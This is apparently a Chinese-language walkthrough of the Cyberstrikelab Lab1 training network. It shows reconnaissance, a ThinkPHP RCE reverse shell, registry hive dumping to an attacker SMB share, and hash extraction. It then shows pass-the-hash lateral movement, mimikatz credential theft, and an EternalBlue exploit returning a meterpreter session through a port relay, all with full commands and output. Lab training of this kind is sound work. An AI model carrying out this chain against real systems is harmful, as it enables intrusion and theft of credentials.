Cyberstrikelab Lab1
首先扫描存活的主机
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo nmap -sn 192.168.10.0/24
[sudo] re1sen 的密码:
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-29 13:49 CST
Nmap scan report for 192.168.10.10
Host is up (0.018s latency).
Nmap scan report for 192.168.10.233
Host is up (0.015s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 10.58 seconds
fscan识别出192.168.10.10这个主机的web端有历史漏洞
┌──(re1sen㉿kali)-[~/tools]
└─$ ./fscan -h 192.168.10.0/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 192.168.10.10 is alive
(icmp) Target 192.168.10.233 is alive
[*] Icmp alive hosts len is: 2
192.168.10.233:8080 open
192.168.10.233:22 open
192.168.10.10:3306 open
192.168.10.10:445 open
192.168.10.10:80 open
192.168.10.10:139 open
192.168.10.10:135 open
[*] alive ports len is: 7
start vulscan
[*] WebTitle https://192.168.10.233:8080 code:404 len:19 title:None
[*] NetBios 192.168.10.10 WORKGROUP\WIN-KOHRC1DGOL9 Windows Server 2012 R2 Standard 9600
[*] WebTitle http://192.168.10.10 code:200 len:25229 title:易优CMS - Powered by Eyoucms.com
[+] PocScan http://192.168.10.10 poc-yaml-thinkphp5023-method-rce poc1
已完成 6/7 [-] ssh 192.168.10.233:22 root 666666 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 6/7 [-] ssh 192.168.10.233:22 root sa123456 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 6/7 [-] ssh 192.168.10.233:22 admin admin@111 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 6/7 [-] ssh 192.168.10.233:22 admin a11111 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 7/7
[*] 扫描结束,耗时: 5m7.45712033s
使用Nmap详细扫描
sudo nmap -sS -p- -Pn -n 192.168.10.233
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-29 14:02 CST
Nmap scan report for 192.168.10.233
Host is up (0.019s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy
11333/tcp open unknown
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo nmap -sS -Pn -sV -sC -O -p22,8080,11333,1 192.168.10.233
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-29 14:03 CST
Nmap scan report for 192.168.10.233
Host is up (0.016s latency).
PORT STATE SERVICE VERSION
1/tcp closed tcpmux
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 d7:c2:6d:c5:b8:41:7d:b5:f9:89:8f:66:fa:f5:0a:96 (RSA)
| 256 7a:20:88:75:f7:10:e6:da:6f:08:f0:24:92:3c:64:60 (ECDSA)
|_ 256 cb:fa:09:6e:4f:84:0e:17:bc:66:ea:0b:fd:55:6a:b4 (ED25519)
8080/tcp open ssl/http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=openvpn/organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=CN
| Not valid before: 2024-09-23T03:05:52
|_Not valid after: 2025-09-23T03:05:52
| tls-alpn:
| h2
|_ http/1.1
11333/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.60 seconds
┌──(re1sen㉿kali)-[~/tools]
└─$ sudo nmap -sS -n -Pn -p- 192.168.10.10
[sudo] re1sen 的密码:
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-29 14:02 CST
Nmap scan report for 192.168.10.10
Host is up (0.018s latency).
Not shown: 65521 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
5985/tcp open wsman
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 30.43 seconds
┌──(re1sen㉿kali)-[~/tools]
└─$ cat raw | awk -F '/' '{print $1}' | tr '\n' ','
80,135,139,445,3306,5985,47001,49152,49153,49154,49155,49156,49157,49158,
┌──(re1sen㉿kali)-[~/tools]
└─$ sudo nmap -sS -Pn -sV -sC -O -p80,135,139,445,3306,5985,47001,49152,49153,49154,49155,49156,49157,49158,1 192.168.10.10
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-29 14:06 CST
Nmap scan report for 192.168.10.10
Host is up (0.015s latency).
PORT STATE SERVICE VERSION
1/tcp closed tcpmux
80/tcp open http Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02)
|_http-title: \xE6\x98\x93\xE4\xBC\x98CMS - Powered by Eyoucms.com
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-robots.txt: 13 disallowed entries
| /*.php* /*.js* /*.css* /data/ /extend/ /install/
|_/weapp/ /public/ /template/ /core/ /vendor/ /appli* /adm*
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3306/tcp open mysql MySQL (unauthorized)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=3/29%OT=80%CT=1%CU=40318%PV=Y%DS=2%DC=I%G=Y%TM=69C8C1B
OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=106%TI=I%CI=RD%TS=7)SEQ(SP=
OS:105%GCD=1%ISR=10C%TI=I%CI=RD%TS=7)SEQ(SP=106%GCD=1%ISR=109%TI=I%CI=RD%TS
OS:=7)SEQ(SP=109%GCD=1%ISR=109%TI=I%CI=RD%TS=7)SEQ(SP=FC%GCD=1%ISR=10C%TI=I
OS:%CI=RD%TS=7)OPS(O1=M551NW8ST11%O2=M551NW8ST11%O3=M551NW8NNT11%O4=M551NW8
OS:ST11%O5=M551NW8ST11%O6=M551ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2
OS:000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M551NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=
OS:80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3
OS:(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%
OS:F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y
OS:%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%R
OS:D=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)I
OS:E(R=N)
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-03-28T22:07:47
|_ start_date: 2026-03-28T21:43:33
| smb2-security-mode:
| 3:0:2:
|_ Message signing enabled but not required
|_clock-skew: mean: -8h00m01s, deviation: 0s, median: -8h00m01s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: WIN-KOHRC1DGOL9, NetBIOS user: <unknown>, NetBIOS MAC: c0:0e:1c:08:e2:98 (unknown)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 77.50 seconds
权衡一下优先级,10主机有明显的漏洞,首先尝试拿下它
既然fscan已经说明了thinkphp的漏洞,拿出thinkphp综合利用工具直接执行命令反弹shell
进入发现权限已经是system,但这一台机器并不是域内机器,先在系统内收集一下敏感信息
看看web程序的配置文件,拿到数据库账号密码
PS C:\phpstudy_pro\www\eyoucms1.0\application> cat database.php
<?php
/**
* ???CMS
* ============================================================================
* ???????2016-2028 ?????????????????????????????????
* ??????: http://www.eyoucms.com
* ----------------------------------------------------------------------------
* ??????????????????????????, ??????????????????.
* ============================================================================
* Author: ?????<1105415366@qq.com>
* Date: 2018-4-3
*/
return array(
// ????????
'type' => 'mysql',
// ????????
'hostname' => '127.0.0.1',
// ??????
'database' => 'eyoucms',
// ?????
'username' => 'root',
// ???
'password' => 'cyberstrike@2024',
// ???
'hostport' => '3306',
但是直接登录mysql上不去
┌──(re1sen㉿kali)-[~/tools]
└─$ mysql -h 192.168.10.10 -uroot -p'cyberstrike@2024'
ERROR 2002 (HY000): Received error packet before completion of TLS handshake. The authenticity of the following error cannot be verified: 1130 - Host '192.168.122.131' is not allowed to connect to this MySQL server
提取本地hash
C:\WINDOWS\system32> reg.exe save hklm\sam C:\sam.save
The operation completed successfully.
C:\WINDOWS\system32> reg.exe save hklm\system C:\system.save
The operation completed successfully.
C:\WINDOWS\system32> reg.exe save hklm\security C:\security.save
The operation completed successfully.
PS C:\> move sam.save \\172.16.233.2\smbFolder
PS C:\> move sam.save \\172.16.233.2\smbFolder
PS C:\> move security.save \\172.16.233.2\smbFolder
PS C:\> mvoe system.save \\172.16.233.2\smbFolder
PS C:\>
在攻击机上用secretdump提取
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL
[sudo] re1sen 的密码:
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0xd5daa144bc6b96230025f59ad779be16
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a167976f7bd8d93ee232fa7a87a4079e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword
(Unknown User):ROOT#123
[*] DPAPI_SYSTEM
dpapi_machinekey:0xf7b0bbda3b85228d37bd939bc086d2f52f2f2609
dpapi_userkey:0xcae8bd5dd30a0aa194105d6f10ae454ed8af3c43
[*] NL$KM
0000 43 DA 40 E3 50 32 9D E9 48 42 DF A5 59 12 FE FD C.@.P2..HB..Y...
0010 91 31 5F EF E6 03 E5 19 4F D1 6E 40 03 42 9E 8E .1_.....O.n@.B..
0020 D9 55 EC 53 D1 84 E0 36 2F 52 7C 7D F0 7D 47 30 .U.S...6/R|}.}G0
0030 F9 86 BF 0A 87 94 61 07 1E 33 B3 4A E8 03 DB 85 ......a..3.J....
NL$KM:43da40e350329de94842dfa55912fefd91315fefe603e5194fd16e4003429e8ed955ec53d184e0362f527c7df07d4730f986bf0a879461071e33b34ae803db85
[*] Cleaning up...
ipconfig 发现还有个ip地址192.168.20.10
上传一个fscan,扫描一下内网
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo evil-winrm -i 192.168.10.10 -u administrator -H a167976f7bd8d93ee232fa7a87a4079e
*Evil-WinRM* PS C:\Users\Administrator\Documents> ./fscan.exe -h 192.168.20.1/24
fscan.exe :
+ CategoryInfo : NotSpecified: (:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.1
start infoscan
(icmp) Target 192.168.20.10 is alive
(icmp) Target 192.168.20.20 is alive
(icmp) Target 192.168.20.30 is alive
[*] Icmp alive hosts len is: 3
192.168.20.30:88 open
192.168.20.10:3306 open
192.168.20.30:445 open
192.168.20.20:445 open
192.168.20.10:445 open
192.168.20.30:139 open
192.168.20.20:139 open
192.168.20.30:135 open
192.168.20.10:139 open
192.168.20.20:135 open
192.168.20.10:135 open
192.168.20.10:80 open
[*] alive ports len is: 12
start vulscan
[*] 192.168.20.10 WORKGROUP\WIN-KOHRC1DGOL9 Windows Server 2012 R2 Standard 9600
[+] NetInfo:
[*]192.168.20.20
[->]cyberweb
[->]192.168.20.20
[+] 192.168.20.20 MS17-010 (Windows Server 2012 R2 Standard 9600)
[+] NetInfo:
[*]192.168.20.30
[->]WIN-7NRTJO59O7N
[->]192.168.20.30
[+] 192.168.20.30 MS17-010 (Windows Server 2008 R2 Standard 7600)
[*] 192.168.20.30 [+]DC __MSBROWSE__\WIN-7NRTJO59O7N Windows Server 2008 R2 Standard 7600
[*] 192.168.20.20 CYBERSTRIKELAB\CYBERWEB Windows Server 2012 R2 Standard 9600
[*] WebTitle:http://192.168.20.10 code:200 len:25229 title:鏄撲紭CMS - Powered by Eyoucms.com
[+] http://192.168.20.10 poc-yaml-thinkphp5023-method-rce poc1
我这里看错了,我把存在MS17-010的主机看成了192.168.20.20,所以我先用msf对其漏洞利用失败了
想到之前dump下了10主机的administrator的hash,看看有没有复用密码,尝试hash传递,果然成功了
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo proxychains -q netexec smb 192.168.20.20 -u administrator -H a167976f7bd8d93ee232fa7a87a4079e --local-auth
SMB 192.168.20.20 445 CYBERWEB [*] Windows 8.1 / Server 2012 R2 Build 9600 x64 (name:CYBERWEB) (domain:CYBERWEB) (signing:False) (SMBv1:True)
SMB 192.168.20.20 445 CYBERWEB [+] CYBERWEB\administrator:a167976f7bd8d93ee232fa7a87a4079e (Pwn3d!)
用evil-winrm登录上20主机,上传一个mimikatz,抓取一下内存里的凭证
┌──(re1sen㉿kali)-[/usr/share/windows-resources/mimikatz/x64]
└─$ sudo proxychains -q evil-winrm -i 192.168.20.20 -u administrator -H a167976f7bd8d93ee232fa7a87a4079e
./mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
*Evil-WinRM* PS C:\Users\Administrator\Documents> ./mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # sekurlsa::logonpasswords
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
发现了一个叫cyberweb的域用户的密码和20主机账号的NTLM哈希
* Username : cyberstrikelab.com\cyberweb
* Domain : cyberstrikelab.com
* Password : qwe!@#123
* Username : CYBERWEB$
* Domain : CYBERSTRIKELAB
* NTLM : 1be27659a8a89f8bf34d8edafece1e61
* SHA1 : f12d1e09a2bd435bdce2d14c0230c5d41d3bf406
分别使用ldapdomaindump和bloodhound-python通过cyberweb用户收集域信息
ldapdomaindump比较适合bloodhound-python失效时简单地收集一下信息
bloodhound-python在这里会报错,域控的DNS服务不可用,可以使用dnschef充当DNS服务器
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ dnschef --file dnschef.ini
/usr/bin/dnschef:453: SyntaxWarning: invalid escape sequence '\/'
header += " / _` | '_ \/ __|/ __| '_ \ / _ \ _|\n"
/usr/bin/dnschef:454: SyntaxWarning: invalid escape sequence '\_'
header += " | (_| | | | \__ \ (__| | | | __/ | \n"
/usr/bin/dnschef:455: SyntaxWarning: invalid escape sequence '\_'
header += " \__,_|_| |_|___/\___|_| |_|\___|_| \n"
_ _ __
| | version 0.4 | | / _|
__| |_ __ ___ ___| |__ ___| |_
/ _` | '_ \/ __|/ __| '_ \ / _ \ _|
| (_| | | | \__ \ (__| | | | __/ |
\__,_|_| |_|___/\___|_| |_|\___|_|
iphelix@thesprawl.org
(19:06:09) [*] DNSChef started on interface: 127.0.0.1
(19:06:09) [*] Using the following nameservers: 8.8.8.8
(19:06:09) [*] Cooking A replies for domain win-7nrtjo59o7n.cyberstrikelab.com with '192.168.20.30'
(19:06:09) [*] Cooking A replies for domain cyberweb.cyberstrikelab.com with '192.168.20.20'
(19:06:09) [*] Cooking SRV replies for domain *.*.*.*.cyberstrikelab.com with '0 5 5060 WIN-7NRTJO59O7N.cyberstrikelab.com'
(19:07:30) [*] 127.0.0.1: cooking the response of type 'SRV' for _ldap._tcp.pdc._msdcs.cyberstrikelab.com to 0 5 5060 WIN-7NRTJO59O7N.cyberstrikelab.com
(19:07:30) [*] 127.0.0.1: cooking the response of type 'SRV' for _ldap._tcp.gc._msdcs.cyberstrikelab.com to 0 5 5060 WIN-7NRTJO59O7N.cyberstrikelab.com
(19:07:30) [*] 127.0.0.1: cooking the response of type 'SRV' for _kerberos._tcp.dc._msdcs.cyberstrikelab.com to 0 5 5060 WIN-7NRTJO59O7N.cyberstrikelab.com
但是都没有发现什么有用的信息,现阶段有价值的域用户除了administrator只有cyberweb
之后尝试了一些横向手段,都没用成功,也用了reg来查询注册表,没有什么可用信息
sudo proxychains -q impacket-psexec -hashes ':df1a4539703be111d30024503a251583' cyberstrikelab.com/'CYBERWEB$'@192.168.20.30
sudo proxychains -q impacket-wmiexec -hashes ':df1a4539703be111d30024503a251583' cyberstrikelab.com/'CYBERWEB$'@192.168.20.30
sudo proxychains -q impacket-reg -hashes ':df1a4539703be111d30024503a251583' cyberstrikelab.com/'CYBERWEB$'@192.168.20.30 query -keyName HKLM\\
sudo proxychains -q impacket-wmiexec cyberstrikelab.com/cyberweb:'qwe!@#123'@192.168.20.30
sudo proxychains -q impacket-reg cyberstrikelab.com/cyberweb:'qwe!@#123'@192.168.20.30 query -keyName HKLM\\
因为只剩administrator,用收集到的所有凭据尝试登陆,全部失败
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo proxychains -q netexec smb 192.168.20.30 -u administrator -H a167976f7bd8d93ee232fa7a87a4079e
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [*] Windows 6.1 Build 7600 x64 (name:WIN-7NRTJO59O7N) (domain:cyberstrikelab.com) (signing:True) (SMBv1:True)
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [-] cyberstrikelab.com\administrator:a167976f7bd8d93ee232fa7a87a4079e STATUS_LOGON_FAILURE
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo proxychains -q netexec smb 192.168.20.30 -u administrator -H a167976f7bd8d93ee232fa7a87a4079e --local-auth
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [*] Windows 6.1 Build 7600 x64 (name:WIN-7NRTJO59O7N) (domain:WIN-7NRTJO59O7N) (signing:True) (SMBv1:True)
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [-] WIN-7NRTJO59O7N\administrator:a167976f7bd8d93ee232fa7a87a4079e STATUS_LOGON_FAILURE
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo proxychains -q netexec smb 192.168.20.30 -u administrator -H df1a4539703be111d30024503a251583 --local-auth
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [*] Windows 6.1 Build 7600 x64 (name:WIN-7NRTJO59O7N) (domain:WIN-7NRTJO59O7N) (signing:True) (SMBv1:True)
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [-] WIN-7NRTJO59O7N\administrator:df1a4539703be111d30024503a251583 STATUS_LOGON_FAILURE
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo proxychains -q netexec smb 192.168.20.30 -u administrator -H 1be27659a8a89f8bf34d8edafece1e61 --local-auth
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [*] Windows 6.1 Build 7600 x64 (name:WIN-7NRTJO59O7N) (domain:WIN-7NRTJO59O7N) (signing:True) (SMBv1:True)
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [-] WIN-7NRTJO59O7N\administrator:1be27659a8a89f8bf34d8edafece1e61 STATUS_LOGON_FAILURE
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo proxychains -q netexec smb 192.168.20.30 -u administrator -H 1be27659a8a89f8bf34d8edafece1e61
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [*] Windows 6.1 Build 7600 x64 (name:WIN-7NRTJO59O7N) (domain:cyberstrikelab.com) (signing:True) (SMBv1:True)
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [-] cyberstrikelab.com\administrator:1be27659a8a89f8bf34d8edafece1e61 STATUS_LOGON_FAILURE
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo proxychains -q netexec smb 192.168.20.30 -u administrator -H df1a4539703be111d30024503a251583
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [*] Windows 6.1 Build 7600 x64 (name:WIN-7NRTJO59O7N) (domain:cyberstrikelab.com) (signing:True) (SMBv1:True)
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [-] cyberstrikelab.com\administrator:df1a4539703be111d30024503a251583 STATUS_LOGON_FAILURE
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo proxychains -q netexec smb 192.168.20.30 -u administrator -p 'qwe!@#123'
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [*] Windows 6.1 Build 7600 x64 (name:WIN-7NRTJO59O7N) (domain:cyberstrikelab.com) (signing:True) (SMBv1:True)
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [-] cyberstrikelab.com\administrator:qwe!@#123 STATUS_LOGON_FAILURE
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo proxychains -q netexec smb 192.168.20.30 -u administrator -p 'qwe!@#123' --local-auth
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [*] Windows 6.1 Build 7600 x64 (name:WIN-7NRTJO59O7N) (domain:WIN-7NRTJO59O7N) (signing:True) (SMBv1:True)
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [-] WIN-7NRTJO59O7N\administrator:qwe!@#123 STATUS_LOGON_FAILURE
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo proxychains -q netexec smb 192.168.20.30 -u administrator -p 'ROOT#123' --local-auth
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [*] Windows 6.1 Build 7600 x64 (name:WIN-7NRTJO59O7N) (domain:WIN-7NRTJO59O7N) (signing:True) (SMBv1:True)
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [-] WIN-7NRTJO59O7N\administrator:ROOT#123 STATUS_LOGON_FAILURE
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo proxychains -q netexec smb 192.168.20.30 -u administrator -p 'ROOT#123'
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [*] Windows 6.1 Build 7600 x64 (name:WIN-7NRTJO59O7N) (domain:cyberstrikelab.com) (signing:True) (SMBv1:True)
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [-] cyberstrikelab.com\administrator:ROOT#123 STATUS_LOGON_FAILURE
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo proxychains -q netexec smb 192.168.20.30 -u administrator -p 'cyberstrike@2024' --local-auth
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [*] Windows 6.1 Build 7600 x64 (name:WIN-7NRTJO59O7N) (domain:WIN-7NRTJO59O7N) (signing:True) (SMBv1:True)
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [-] WIN-7NRTJO59O7N\administrator:cyberstrike@2024 STATUS_LOGON_FAILURE
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo proxychains -q netexec smb 192.168.20.30 -u administrator -p 'cyberstrike@2024'
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [*] Windows 6.1 Build 7600 x64 (name:WIN-7NRTJO59O7N) (domain:cyberstrikelab.com) (signing:True) (SMBv1:True)
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [-] cyberstrikelab.com\administrator:cyberstrike@2024 STATUS_LOGON_FAILURE
┌──(re1sen㉿kali)-[~/misc/labs/lab1]
└─$ sudo proxychains -q netexec smb 192.168.20.30 -u administrator -H a167976f7bd8d93ee232fa7a87a4079e
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [*] Windows 6.1 Build 7600 x64 (name:WIN-7NRTJO59O7N) (domain:cyberstrikelab.com) (signing:True) (SMBv1:True)
SMB 192.168.20.30 445 WIN-7NRTJO59O7N [-] cyberstrikelab.com\administrator:a167976f7bd8d93ee232fa7a87a4079e STATUS_LOGON_FAILURE
扫描了域控上的所有共享也没有发现
最后发现就是看错了,原来MS17-010是域控上的,直接就结束了,白折腾大半天
在跳板机上做端口转发,让shell弹回来
netsh.exe interface portproxy add v4tov4 listenport=24444 listenaddress=192.168.20.10 connectport=24444 connectaddress=172.16.233.2
msf exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.20.30
rhosts => 192.168.20.30
msf exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.20.10
lhost => 192.168.20.10
msf exploit(windows/smb/ms17_010_eternalblue) > set lport 24444
lport => 24444
msf exploit(windows/smb/ms17_010_eternalblue) > run
[-] Handler failed to bind to 192.168.20.10:24444:- -
[*] Started reverse TCP handler on 0.0.0.0:24444
[*] 192.168.20.30:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.20.30:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7600 x64 (64-bit)
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/recog-3.1.23/lib/recog/fingerprint/regexp_factory.rb:34: warning: nested repeat operator '+' and '?' was replaced with '*' in regular expression
[*] 192.168.20.30:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.20.30:445 - The target is vulnerable.
[*] 192.168.20.30:445 - Connecting to target for exploitation.
[+] 192.168.20.30:445 - Connection established for exploitation.
[+] 192.168.20.30:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.20.30:445 - CORE raw buffer dump (36 bytes)
[*] 192.168.20.30:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 192.168.20.30:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
[*] 192.168.20.30:445 - 0x00000020 37 36 30 30 7600
[+] 192.168.20.30:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.20.30:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.20.30:445 - Sending all but last fragment of exploit packet
[*] 192.168.20.30:445 - Starting non-paged pool grooming
[+] 192.168.20.30:445 - Sending SMBv2 buffers
[+] 192.168.20.30:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.20.30:445 - Sending final SMBv2 buffers.
[*] 192.168.20.30:445 - Sending last fragment of exploit packet!
[*] 192.168.20.30:445 - Receiving response from exploit packet
[+] 192.168.20.30:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.20.30:445 - Sending egg to corrupted connection.
[*] 192.168.20.30:445 - Triggering free of corrupted buffer.
[*] Sending stage (230982 bytes) to 192.168.10.10
[*] Meterpreter session 1 opened (172.16.233.2:24444 -> 192.168.10.10:49331) at 2026-03-29 19:58:11 +0800
[+] 192.168.20.30:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.20.30:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.20.30:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
浙公网安备 33010602011771号